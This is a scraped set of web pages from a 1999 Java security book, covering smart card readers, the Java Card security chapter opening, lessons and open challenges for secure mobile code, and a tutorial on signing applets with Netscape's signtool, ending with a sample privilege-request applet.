Unlike traditional computers, smart cards are not delivered with a built-in power supply, a keyboard, or a display device. That means smart cards require a terminal in order to work. Such a terminal is usually called a smart card reader or a card acceptance device (CAD). Some of these readers can be quite small and provide limited capabilities. For example, one CAD popular in Europe among users of stored-value telephone cards is not much bigger than a smart card itself. This CAD's sole purpose is to display the balance of money stored on the card. (Having a trusted device with which to query a card you own is important for consumer peace of mind, especially when spending money at businesses that are of questionable trustworthiness. Plus, it's nice to be able to verify that transactions, like adding money to a card, actually happen properly.) CADs are also present at merchant sites (usually in the form of point-of-sale devices) and at issuing banks. These CADs may look much like a typical point-of-sale credit card processor, with a small display screen and a few buttons for answering queries or entering PINs. In similar fashion to today's ATMs, a smart card is inserted directly into the reader. The reader then provides power to the card and sets it up to receive software commands. Although a CAD of this sort may look like an ATM on the outside, a smart card is much more powerful than an ATM card or a mag-stripe credit card. These latter cards store only a few kilobytes of information on the magnetic stripe and are not capable of performing computations. Smart cards can store many megabytes of information and carry out sophisticated cryptographic calculations. Another sort of CAD more commonly encountered by developers is a CAD connected directly to the serial port of a standard PC. Using development environments similar to those used in normal application development, programmers can create code for smart cards, download it into a prototyping card, and in this way create new smart card applications. Most major smart card vendors have proprietary Java development environments: Gemplus offers the GemXpresso environment; Schlumberger offers Cyberflex. There are many custom command sets for smart cards. In fact, there are so many custom environments and they are so specialized that the number of smart card programmers is very small. Considering that smart cards are traditionally programmed in platform-specific assembly languages and that each vendor has a different language, the small number of programmers should come as little surprise. The situation could be worse, of course. At least all of the major vendors conform to a set of common communications standards. The ISO 7816 specifications provide at least some common ground and ensure
that smart cards have similar terminal pin-outs, accept standard protocol messages, and store some information in databases of common design [ISO7816, 1987]. ISO 7816 defines some commands in great detail and lays out communication protocols used by smart cards. Because of the existence of 7816, a smart card made by, say, Gemplus, can interface with a CAD meant for, say, Schlumberger cards. Smart cards have long been associated with security since they provide a partial solution to the need for personal identification and nonrepudiation. Because smart cards provide more nonvolatile storage than other highly portable devices, they make ideal storage compartments for digital identities. They can also compute hashes, session keys, digital signatures, and MACs right on the card. To the extent that a card is tamper resistant (something we will discuss further later in this chapter), it can be used to store important secrets such as DES keys or RSA private keys.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Java Card Security: How Smart Cards and Java Mix CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Next Page
Section 1 -- Java Security Goes Both Ways
There are a large and growing number of Java systems running the gamut from Java gizmos such as Java rings, through smart cards with built-in Java interpreters (the subject of this chapter), to complete Java Development Kits and Integrated Development Environments (IDEs). Java is simultaneously making inroads on many fronts. In distributed systems, Java-based servers and servlets are becoming as common as Java clients. As with any platform meant to interact in a networked world, there are security concerns with each flavor of Java. These concerns take on a new urgency when it comes to e-commerce. When electronic blips are money, the stakes change considerably. It may be an inconvenience to lose a Web server that amounts to fancy brochureware; it is something else entirely if the Web server and its associated backend perform all customer transactions. The security concerns raised by e-commerce are a large enough topic in their own right that there is no way we can do them justice here. Of course, because Java is commonly used at all levels in e-commerce systems, the risks we identify have serious e-commerce implications. This is especially true for Java cards. Counterintuitively, Java is both growing and shrinking at the same time. On one hand, the JDK, now up to Java 2, is doubling in size with each major release. Just to complicate matters, at the same time as the explosive growth of the code base is occurring, the security architecture is undergoing major reorganization. Chapter 2, "The Base Java Security Model: The Original Applet Sandbox," and Chapter 3, "Beyond the Sandbox: Signed Code and Java 2," detail the new model. On the other hand, embedded Java systems like Card Java 2.x strip Java functionality down to bare bones. The security model is not immune to this effect and has been deeply affected by Java's migration to smart cards. These two diverse directions both have important security implications. Java 2 involves fundamental changes to the Java security model as the Java sandbox metamorphoses itself into a trust-based system built on code signing. Card Java 2.x removes much of the sandbox, leaving smart card applets more room
to misbehave.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
The Future of Java Security: Challenges Facing Mobile Code CHAPTER SECTIONS: 1 / 2 / 3 / 4 Previous Page
Next Page
Section 1 -- Lessons from the Trenches
Java has evolved more quickly than any other computer language in widespread use. As the language itself has evolved, so, too, has the security model. Here are some lessons we have learned as we have watched Java's approach to security change. Type safety alone is not security. Chapter 1, "Mobile Code and Security: Why Java Security Is Important," and Chapter 2, "The Base Java Security Model: The Original Applet Sandbox," explain why type safety is critical to Java's security model. Chapter 5, "Attack Applets: Exploiting Holes in the Security Model," shows what happens when type safety is compromised. Java security is much more than type safety, however. Think of type safety as the foundation of a complete Java security solution. The foundation is essential, but much needs to be built on top of the foundation to make a useful building. Real security is more difficult than it sounds. Securing a system as complex as Java (not to mention systems built on top of Java) is a nontrivial undertaking. Do not let slick marketing convince you that building a secure system is easy. It isn't. Java provides a powerful set of tools that can help you create a secure system, but simply using the tools is no guarantee of success. You must use the tools wisely and closely scrutinize your system from a security perspective. If ever there was a time to practice solid software engineering, design, and implementation of secure systems, it is now. It is impossible to separate implementation errors from design problems. Recurrent security problems are a clue that something is wrong with the way in which a system is being developed. These problems are introduced at many different stages of system design and implementation. In today's fast-paced consumerware market, security assurance is often among the first things to go. Specifications, if they exist, are vague. Sometimes they are silent on critical points, leaving the implementor to play a guessing game. What may seem to be a simple security bug often indicates deeper problems in the development process. New features introduce new security holes. Java has grown by leaps and bounds. With each major
release of Java, a number of new serious security holes have been discovered. This is not surprising. It is exceptionally difficult to get everything exactly right in a complex system, and security demands nothing less. Java 2 introduces many powerful new features into Java. Security holes are likely to be discovered in the implementation and design of these features. New classes of attacks keep appearing. Security attacks can be likened to rushing floodwater; sometimes the places they flow are surprising. It is not possible to anticipate all future security attacks, mostly because security attacks break systems in novel ways. Do not rely on using only historical data for security analysis and protection. There is much more to real security expertise than being able to recount stories of past compromises. Humans are an essential element to consider. No system as complex as the Java platform can be used without lots of human intervention. Java 2 provides a perfect example of this fact. Without proper policy creation and management, trust-based security models are exceptionally dangerous. Proper use of advanced technologies requires forethought, planning, and careful management. A big part of this management is anticipating what real users of a system are likely to do, as well as what real attackers are likely to do. These lessons are relevant to each and every security-critical, Java-based system. Creating a secure system is hard work, but it is quite possible to come up with a system that will have reasonable security in the trenches and address a majority of risks as well.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
The Future of Java Security: Challenges Facing Mobile Code CHAPTER SECTIONS: 1 / 2 / 3 / 4 Previous Page
Section 2 -- Challenges for Secure Mobile Code
Next Page
Java has risen to meet many important challenges of mobile code security. That means Java is by far the most security-aware of the many mobile code platforms. If you want to use mobile code and you are concerned with security, use Java. Of course, things are not perfect and there are still some open problems. Here are a number of remaining challenges that secure mobile code systems, including Java, must face.
Denial of Service We spent some time discussing denial of service in Chapter 4, "Malicious Applets: Avoiding a Common Nuisance." As we said there, denial of service is a difficult problem for computer security that has yet to be addressed, not just in Java, but all over the network infrastructure. Successful denial-of-service attacks have been carried out against ISPs by exploiting weaknesses in TCP/IP, the protocol that is the life blood of the Internet. Java is not immune to the denial of service problem, either. Denial of service can be more or less serious depending on where the problem manifests itself. On one hand, if a hostile applet crashes one user's browser by popping thousands of large windows, not much real harm is done. On the other hand, if a servlet crashes an enterprise Web server, real harm occurs. Our Chapter 4 discussion focused primarily on the client side; however, Java is making inroads in places where denial of service takes on more urgency as a problem. Server-side Java is one example. Another example can be found in systems with built-in Java VMs like Oracle8 or HP Printers. The implications of denial of service for these systems is much greater than in the client case. New forms of denial-of-service attacks will be made possible with complex client-server systems like RMI that make extensive use of networking, synchronization, and locks. Denial of service in such a system
becomes as easy as holding a lock. Distributed system applications will need to apply timeouts and other mechanisms to mitigate the risks of an uncooperative process. Dealing with denial of service is not an easy task. Limiting resource allocation is one solution. Perhaps future versions of Java will include policy elements that can specify resource limits on the basis of identity. That way, constraints can be managed according to where code is coming from and how much it is trusted. These sorts of hooks do not yet exist in the Java 2 model.
Understanding Code Signing There are a number of myths about code signing. Here are some of the most egregious: Myth: Signatures denote authorship. The only thing a signature really tells you is who signed the code. From this piece of information, people infer a sense of vouching; that is, if a piece of code is signed, the implication is that the signer somehow vouches for the code. Unless you trust the person or organization who signed a piece of code, code signing gives you nothing. In the end, code-signing schemes simply amount to technological wrappings around a human trust decision. Myth: If a signer is honest, the code is secure. Clearly, since all that a signature tells you is who signed the code, the signature says absolutely nothing about the code's security. Even the best-intentioned signer can only give you an honest opinion about the code, and that opinion might not be worth much if the signer isn't a technical expert. Certification schemes may begin to change the way this works if there are well-known, competent organizations that choose to vouch for certain code properties. These organizations can have signatures that count as validation stamps. Myth: Signatures imply accountability/liability. The legal ramifications of digital signatures and what they denote have yet to be tested in the courts. Given the state of software liability in the industry, it is unlikely that a signature will carry much legal weight in terms of liability. Assuming these myths are properly debunked, there are still some real barriers to trust models based on digital signatures. One of the main problems that will deeply impact the adoption of signing-based approaches is the lack of a public key infrastructure (PKI). Without some way of quickly and easily validating a signature, the market is unlikely to embrace code signing quickly. Adding to any lethargy in adoption caused by the poor state of the PKI is the equally poor state of tools for managing digital identities and policies (see Chapter 6, "Securing Java: Improvements, Solutions, and Snake Oil"). In particular, issues of certificate revocation and storage loom large.
Secure Distributed Programming
Distributed computing is still in its infancy. Complex systems like CORBA reflect this. Managing trust, identity, and policy in a distributed system is much more difficult than doing so on a VM-by-VM basis using, for example, Java 2. Standards are emerging slowly, and there is much confusion in the market regarding competing systems. Choices include Java's RMI, CORBA (encompassing both IIOP and IDL), and DCOM (or one of its many marketing identities). Common to all of these approaches is the problem of complex identity, which is not well understood. Figure 9.1 shows why the problem is difficult. In real distributed systems not only is code mobile, but other functionality is, too. Interprocess communication across different machines can get hairy fast. RMI may not be equipped to handle some of the challenges that trust models entail.
Figure 9.1 The problem of complex identity. In this example, Bob's applet, running on Alice's VM is communicating (possibly using RMI) with Donna's applet, running on Charlie's VM. Creating usable policies for situations like these is not well understood.
Being a True Multiuser System The Java VM is not currently a replacement for a multiuser operating system. Neither is JavaOS a real multiuser operating system. JavaOS in its current instantiations is meant only to run a single Java VM. Object sharing and process firewalling rely on this fact to work. There are many problems to solve before the VM can serve as a true multiuser environment, and researchers are just starting to address them.
Persistence, Linking, and Versioning Systems in which objects can be serialized (think of it as freeze-drying a process) and reconstituted elsewhere (thawed out) are susceptible to the "environment problem," and it is likely that security holes will be discovered in these systems. The problem is that there is no guarantee that the environment in which an object is thawed will be remotely similar to the one in which it was frozen. This can be a problem if the object assumes (as almost all code does) that its environment doesn't suddenly undergo
drastic changes. This kind of problem can easily lead to type-safety problems and security risks. The problem can be related to Descartes' brain in a vat experiment. In that venerable thought experiment, seventeenth-century philosopher Rene Descartes (of "I think, therefore I am" fame) asked how it is that we know for certain that our perceived environment is really there-that we are not simply a brain in a vat that is being fed all the right data by a malicious demon. The unfortunate answer is that we can't ever be certain. If you substitute serialized code for the brain and the environment for the vat (and the controlling demon), you can get the idea. Deserialized software will never be in the position to probe its environment in order to discover where it really is or whether its environment is telling it the truth. This is problematic when it comes to security parameters and types. Actually, this analogy works well for mobile code in general.
Design for Security Java offers a number of tools with which secure systems can be built. Obviously, this does not imply that all systems written in Java that make use of its security features will be secure. Designing a secure system takes much foresight and demands rigorous assurance at all levels of the process. Risk-based security testing can help. The best security-assurance approach begins with a system specification. Given a detailed-enough specification, a thorough risk analysis can identify potential vulnerabilities and point out areas of the system with the greatest risk. Security risk analysis includes characterizing threats and attacks and working out attack scenarios based on potential attacks. For example, a specification may prove vulnerable to playback attacks (a common problem among systems originally designed for use on proprietary networks), decompilation (in which mobile code secrets can be divulged), or cryptanalysis attacks (in which things like weak data integrity hashes can lead to complete system compromise). Given a thorough risk analysis of a system specification, the next step is to create a plan for probing system security through testing. Note that the kind of testing we are talking about here is not functional testing; it is risk-based testing related directly to the risk analysis. Functional testing tells you only if your system meets design specifications and produces the right output. Risk-based security testing tells you whether your system can be compromised by security attack. Security testing is at its heart a creative endeavor that is only as powerful as the risk analysis on which it is based. As such, security testing is no guarantee of security, but it certainly beats not testing for security at all. By following a proper test plan, actual testing can be carried out on a live system. External analysis for security is a good idea. Note that the definition of external can vary. At the very least, a security review should be performed by a different team (within the same organization) from the design team. Designers tend to be too close to the system and tend to overlook security problems, even if they understand security well. In any case, it is essential that external reviewers have a strong body of security
expertise and knowledge on which to draw. Analysis by external security experts may be warranted as well, although only for truly security-critical systems. Systems that are designed expressly with security in mind usually turn out better than those that are not. One of the worst approaches to take is to try to bolt security on the side of an existing system. This is especially true of systems that have been fielded successfully on proprietary networks (or no network at all) and that are migrating to the Internet.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
The Future of Java Security: Challenges Facing Mobile Code CHAPTER SECTIONS: 1 / 2 / 3 / 4 Previous Page
Next Page
Section 3 -- Software Assurance for Java
Many organizations creating security-critical code, especially those in the electronic commerce arena, have reputations to protect. Banks, for example, are reluctant to talk about security problems for good reason-bank customers expect their bank to have excellent security. No one wants to play Russian Roulette with his or her money (unless, of course, he or she is in Las Vegas). The same can be said of any organization that has essential information assets to protect. Strong security assurance practices can help. The main objective behind software assurance is making sure that software does what it is supposed to do. Software assurance encompasses more than just security. The same core idea-making software behave-is deeply entwined with software reliability and software safety as well.
Sound Software Engineering The most effective way to make sure your code behaves itself and does not introduce unnecessary risk is to practice sound software engineering. Following a reasonable development process is a good start. Begin with a problem-analysis phase that delivers both a set of requirements and a high-level specification. Develop a software assurance plan simultaneously, so that problems are identified and removed as early in the development life cycle as possible. The earlier you remove problems, the more money you save. Unfortunately, many software organizations creating software for the consumer market have poor software development practices. Partly because of supercompressed development schedules, specifications are rarely created. Without a specification, it is not possible to undertake a proper security analysis. Lack of a specification makes testing harder, too. There are two main constraints on testing in the real world: 1) Exhaustive testing is known to be impossible (one of the fun results of theoretical computer
science) and 2) testing resources are always limited. This implies a direct need for ways to optimize testing and get the most bang for your testing buck. In terms of security assurance, a risk-based approach to testing is very cost effective. (See page 250.) Automated tools and methodologies can help make software assurance more effective as well. The days in which software analysis and testing was a black art are ending. A number of technologies-for example, code coverage analysis-are entering the mainstream. Test tools can be just as effective for security analysis as they are for more standard functional testing, especially when they are wielded by security experts. Advanced assurance methodologies like software fault injection are also maturing into powerful tools [Voas and McGraw, 1998]. The best approach to security is to design security into a system instead of adding it later. The earlier in a development process that this can happen, the better. Risk analysis can be applied at all levels of the software process, from requirements to finished process. Together, risk analysis and testing for security result in a strong methodological approach.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
The Future of Java Security: Challenges Facing Mobile Code CHAPTER SECTIONS: 1 / 2 / 3 / 4 Previous Page
Next Page
Section 4 -- Should You Use Java?
By now you should know the authors' answer to this important question: Java has much to offer, but its use should be managed wisely. Although one might like a simpler answer, there is no way to properly make Java-usage decisions on anything other than a case-by-case basis. The way to make your own decision about Java is to start by assessing your risks. What could you lose? The next step is to weigh the risks against the benefits. Is what you gain worth the potential loss? Java has lots to offer. It's the most viable attempt so far to provide secure mobile code. Java is deeply tied to the Web and comes with many advanced networking features. Java is powerful and can be used to write full-fledged programs. Java is a more portable application language than any other on the market today. Java includes advanced language features that all developers should have access to. To top it off, Java is truly concerned with security. On the other hand, by using Java, you are taking risks. Security can never be completely guaranteed. Anyone who tells you it can is wrong. By connecting your computer to the Net at all, you have decided to take some degree of risk. If you're willing to do that, then you should probably be willing to use Java. Then again, there are things about Java that set it apart from other languages and Internet services. For one thing, Java makes running someone else's untrusted code a normal event! The previous chapters have explained the current Java security model. Included in that discussion is an analysis of the vulnerabilities found thus far. Hostile applets-both in the serious attack applet guise and in the malicious applet guise-are a possibility that needs to be taken seriously. Security research on Java will continue to expose problems in the future. The security community, working closely with Sun Microsystems and the Java licensees, will make sure each new vulnerability is quickly and properly patched. In addition to discussing particular bugs in the current Java implementations, we have also examined some more general concerns. Hopefully, most of these will be addressed in the enhancements planned for the
near future. Finally, we have introduced some guidelines by which Java can be developed and used in a more secure manner. If you are a Java developer (or a development leader), you can use our developer guidelines to defend your code against security attacks. If you are a Java user (or part of an enterprise built around Java), you can use our user guidelines to mitigate common risks. We hope this book continues to prove a useful reference on Java security. Armed with this information, you can make informed decisions regarding Java use for yourself and your business.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Frequently Asked Questions Previous Page
Next Page
See the up-to-date FAQs on the Web: Java Security FAQ Java versus Active X
●
●
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Java Security Hotlist Previous Page
Next Page
See the Java Security Hotlist, a feature of the Java Security Website: http://www.rstcorp.com/javasecurity/links.html
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
How to Sign Java Code Previous Page
Next Page
This tutorial was put together by John Viega and Tom O'Connor, both research associates at Reliable Software Technologies. The four major sections each describe a separate vendor's code-signing tools, including: ● ● ● ●
Netscape's Object Signing Microsoft's Authenticode Sun's JDK 1.1 Code Signing Sun's Java 2 Code Signing
Some of the tools are tricky to figure out and use. This tutorial should help. Before you dig into this tutorial, you should read Chapter 3, "Beyond the Sandbox: Signed Code and Java 2," which discusses the major impact that signed code has on the Java security architecture. Of special interest are the sections entitled Signed Code (see page 88) and Trust (see page 92). The material there discusses the notions of trust, digital signatures, and certificate authorities.
Appendix C Sections 1. 2. 3. 4. 5. 6. 7. 8.
Signing Classes with the Netscape Object Signing Tool Signing Java Applets with Microsoft's Authenticode Comparing Authenticode to Netscape Object Signing Signing Code with Sun's JDK 1.1.x Differences Between Netscape Object Signing and JDK 1.1.x javakey Signing Code with Sun's Java 2 Differences between JDK 1.1 Code Signing and Java 2 Code Signing In Conclusion
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
How to Sign Java Code CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Section 1 -- Signing Classes with the Netscape Object Signing Tool
Next Page
First in our tutorial, we'll take on Netscape's Object Signing Tool that can be used to sign Java code (among other things). As in all of these systems, step one is obtaining an identity.
Getting a Certificate Most digital signature schemes (PGP being a notable exception) involve the use of a Certificate Authority (CA)-an organization that can vouch for someone's signature. After all, why trust code just because it carries a signature? We need an objective third party to make sure people are who they say they are. That means the first task in code signing is to obtain the proper credentials from a CA. There are many CAs that can sell you certificates for signing Java code. Netscape has links to CAs that support their Netscape Object Signing Tool at https://certs.netscape.com. You can visit that page and pick a CA. Make sure that the CA you choose provides a certificate that can be used to sign objects (some certificates can't). VeriSign offers many flavors of Digital IDs. It heads up Netscape's list of CAs. We'll use VeriSign as an example for obtaining a certificate; however, note that the process will differ depending on the CA that you choose. To get a VeriSign certificate for Netscape Object Signing, select Software Developer ID from the popup list at the top of VeriSign's homepage. Choose Netscape Object Signing from the page that follows. There are two kinds of Software Developer IDs: a Class 2 Individual ID, and a Class 3 Commercial ID. The Class 2 ID costs $20 annually, while the Class 3 ID is a whopping $400 annually. For our purposes, we'll focus on Class 2 certificates. After selecting Class 2, fill out the information form that asks who will be identified by the certificate (making sure to include the all-important billing information).
VeriSign will do a limited background check on you before it will issue a certificate. For example, it checks the data you enter against information publicly available on you through a credit check. If your request for a certificate is accepted, VeriSign will email you a PIN and a URL that you can use to retrieve the certificate. For an individual Class 2 certificate, the verification process is usually close to instantaneous. Once you receive that information, open the URL with Netscape Communicator and then enter your PIN. Communicator will install the certificate in itself automatically. If you are using a shared version of Communicator, someone may have already entered a password for the certificate database that is stored in your browser. You will need this password before you can download and install your certificate; otherwise, you will be prompted to enter a password for the certificate database. Although this password is optional, it does prevent people from starting up your version of Netscape and stealing your certificate by exporting it. You definitely don't want your certificate stolen, because then other people can sign applets as you. Password information can be found in the Security Info box of the Communicator menu, under Passwords. If everything is successful, your certificate will appear in the Security Info box; check by going to Yours under Certificates. There are several things to know as you sign up for a certificate: 1. You do not want a Class 1 certificate, as it cannot be used to sign objects. 2. Use Netscape Communicator (4.x), even though you are allowed to request and download a certificate using Netscape Navigator 3.x, because the support for certificates in 3.x is not as good as it is in later browsers. For example, object signing tools may not be able to locate your certificate inside Netscape 3.x. Also, you may not be able to export your certificate, which is useful if you want to sign code from a machine other than the one from which you originally downloaded the certificate. 3. Use the same browser on the same computer both to request and to retrieve the certificate. If the browser is set up with multiple user profiles, make sure you use the same user profile as well; otherwise, you will likely be unable to retrieve your certificate. 4. Finally, note that many versions of Netscape Communicator will be unable to verify your certificate (assuming you got a VeriSign certificate). Unfortunately, information concerning this problem seems to have disappeared from the Netscape Web site.
Exporting and Importing Certificates It is a good idea to export your certificate to a file, just in case you install a new version of Communicator over your old one. Doing so also allows your certificate to follow you to other machines. To export a certificate, bring up Communicator's Security Info dialog box. Select the certificate you wish
to export by clicking on its name. Then, click on the Export button. At this point, you may be asked to enter the password that protects your local browser's certificate database. Next, you will be asked to enter a password to protect the certificate data. This password is used to make sure that no one can steal your certificate if he or she sees an exported copy of it somewhere (unless that person is able to crack your password, so choose wisely!). To make sure you typed the password in correctly, you will be asked to enter it again. Assuming you've entered the same password both times, Netscape will prompt you for a filename, which it will use to store the certificate. Once you enter the filename, you're finished exporting the certificate. You can copy that file to another machine so you can sign code from there as well. To import a certificate into a new browser, bring up Communicator's Security Info box. Click on Yours, which is a subitem of Certificates. Press the button, Import a Certificate. If you have not previously entered the password protecting the certificate database of the local copy of Netscape, you will now be prompted to enter it. After you enter the correct password, a file dialog box will come up; use it to select the file containing your certificate. Once you have selected the file, you will be prompted for the password used to protect the certificate, which is the password that you entered when you exported the certificate. At this point, assuming all has gone well, you should get a dialog box indicating success.
Netscape Object Signing Tool 1.1 The Netscape Object Signing Tool is a command line program that creates digital signatures for files. These signatures aren't stored in the files themselves; they're stored in the JAR file in which you bundle your applet. Note that since digital signature information is transmitted in JAR files, you must package your applets in a JAR file in order to sign them, even if they consist only of a single class. The important syntax for using a JAR file with the HTML APPLET tag is: <APPLET CODE="somefile.class" ARCHIVE="jarfile.jar"> where somefile.class is the class in the JAR file where execution should begin, and jarfile.jar is the URL of the JAR file. The Netscape Object Signing Tool may be downloaded from developer.netscape.com/software/signedobj/jarpack.html. The tool is available for most operating systems. While, as of this writing, version 1.0 is still available for download, we recommend that you use version 1.1. After the download is complete, unpack the archive file in a directory. Included are three files: readme.txt, license.txt, and signtool. To make signing objects easier, put the directory that contains signtool in your PATH environment variable, as per your operating system. For example, a Windows 95 user who unpacked the tool to C:\nos would run the following line (and then add it to the autoexec.bat file):
PATH=%PATH%;C:\nos Before attempting to sign anything, check to see if signtool is able to locate the certificate that will be used to sign objects. Unix flavors of signtool look for certificates in the $HOME/.netscape. If your local Netscape files are kept somewhere else, or if you are using the Win32 version, signtool must be explicitly told the path to the certificates. This is done with the -d flag. On Win32, this path is commonly c:\Program Files\Netscape\Users\name, where name is the name of your Netscape Profile. To verify that your signing certificate was installed properly, run signtool -l or, if your certificate cannot be found, signtool -d"<path to certificates>" -l For example, if your certificates were stored in C:\nos, you would type: signtool -d"C:\nos" -l If your certificate still does not appear in the listing, verify that the certificate is installed in Netscape properly. (See the instructions given earlier). Also check that the path to the Netscape .db files was properly specified. If all else fails, check with Netscape and the issuing Certificate Authority. Make note of the full name of your certificate as it appears in the listing, you will need these data when it comes time to sign. Create a directory in which to put all the class files for the applet you wish to sign. Once all the class files that make up the applet are in the right place, the signtool program can create a signed JAR file in one step. Navigate into the directory containing the soon-to-be signed classes. To sign the classes and create a JAR file in one step, issue the command: signtool -d"" -k"" -e ".class" -Z myjar.jar . If your Communicator Certificate Database is password protected, signtool will prompt for the password before signing the classes. The "." at the end of the command should be the last thing to appear. It specifies that the signing should begin in the current working directory. The signtool command recursively signs files by default. To keep the tool from recursing through directories, add --norecurse to the command line. Here's a brief explanation of the flags used in the previous example, as well as some of the other more useful flags for signing applets: -k "certificate name": Specifies the certificate with which you would like to sign. This flag is necessary when signing an applet. The certificate name should be the entire name of the certificate as it appeared as the output of signtool -l. Since the certificate name is likely to have spaces in it, make sure you place it in quotes; otherwise, the signing will fail.
-e".extension": Specifies the file extensions to sign. If you don't include this flag, the tool will sign all files, as opposed to the preceding example, which uses this flag to sign .class files only. -x"name": Allows you to sign all files except a particular file or directory. An example where this might be useful is when you are using an untrusted library in your applet. You probably will not want to vouch for code you did not write! -Z"jarfile": Specifies the name of the JAR file to create. If you omit this option, you will have to JAR everything up yourself. When the JAR file is created, signtool can be used to test the validity of the signatures. This is done by issuing the command: signtool -d"<path to certificate>" -v myjar.jar signtool will list the contents of the JAR and verify that they have been signed, and that they have not been tampered with since the signature was created. You may also check to see who signed the JAR file: signtool -d"<path to certificate>" -w myjar.jar signtool can be used to sign anything, not just Java files. In fact, it can extract JavaScript from HTML files, and sign just the JavaScript; however, that functionality is outside the scope of this tutorial. Documentation on signtool is available from Netscape at developer.netscape.com/docs/manuals/signedobj/signtool/.
Adding Capabilities to Your Classes As Chapter 3 describes, signing a Java applet does much more than just allow people to verify that you signed it. It can also give your applets the chance to step outside the Java sandbox. If your applet has a digital signature vouching for it, then the applet may request special privileges, such as accessing the file system. However, the user of the applet doesn't have to let your applet do what you request just because you sign it. The special privileges an applet can request are called capabilities by Netscape.1 Predictably, no two browsers support flexible privileges in quite the same way, so privilege-management code will only work with one browser. (So much for "write once, run anywhere"!) As a result, while Netscape keeps its own
internal version of these classes, in order to actually compile and test an applet that can request them, you must download the library from developer.netscape.com/ docs/ manuals/signedobj/capsapi_classes.zip Put the zip file in your CLASSPATH (or otherwise edit the CLASSPATH). Now you will be able to develop code that requests extra privileges in Netscape. Note that you should not include these classes with your applet; the Netscape browser running on the remote machine will use its internal version of the classes. The Capabilities library provides a class called the Privilege Manager that handles requests from the program to turn on and off privileges. When the first request to enable a certain privilege is made, the Privilege Manager prompts the browser's user, showing the certificate used to sign the code requesting the privilege, and asking whether the privilege should be granted. See Figure C.1. If the user agrees to grant the privilege, the privilege is granted for the lifetime of the applet. However, once the applet has obtained a privilege, it can turn the privilege off and on at its discretion.
Figure C.1 Netscape Navigator's Privilege Manager alerts a browser user with this window. The dialog box explains which dangerous privileges have been requested and who is vouching for the applet (through a digital signature). Clicking the "Remember this decision" is probably a bad idea.
To request a particular privilege to be enabled, you use the static method enablePrivilege() of class
netscape.security.PrivilegeManager. The method takes a single String argument, which is the name of the privilege to enable. Some useful privileges include: UniversalFileAccess: This privilege gives the applet the ability to access any file available to the user. It will enable the applet to call most things in the java.io package related to file manipulation. This privilege is a superset of other file manipulation privileges that may be requested individually, such as UniversalFileRead, UniversalFileWrite, and UniversalFileDelete. UniversalSendMail: This privilege allows the applet to send email on behalf of the user. UniversalExitAccess: Allows the Java applet to shut down the Netscape browser. UniversalExecAccess: Enables the applet to run programs already stored on the user's local computer. PrivateRegistryAccess: Grants access to application-specific portions of the computer's registry (Win32 only). There are many more privileges that an applet can request. For a full list, see the documentation for the Capabilities API at developer.netscape.com/docs/manuals/signedobj/capabilities/01cap.htm. A call to enablePrivilege will throw an exception that the applet must catch if the user decides not to grant the privilege specified in the call. Thus, the applet must be prepared to catch instances of netscape.security.ForbiddenTargetException. Here's a sample applet called FirstTry.java that uses enablePrivilege import import import import
java.applet.*; java.awt.*; netscape.security.PrivilegeManager; netscape.security.ForbiddenTargetException;
public class FirstTry extends Applet { private TextArea ta = new TextArea(10,100); public void init() { this.add(ta); this.show(); try { PrivilegeManager.enablePrivilege("UniversalFileRead");
ta.appendText("Read enabled!\n"); } catch (ForbiddenTargetException fte) { ta.appendText("Read not enabled.\n"); ta.appendText(fte.toString()); } catch (Exception e) { ta.appendText("Unexpected exception!\n"); } public void paint(Graphics g) { } }
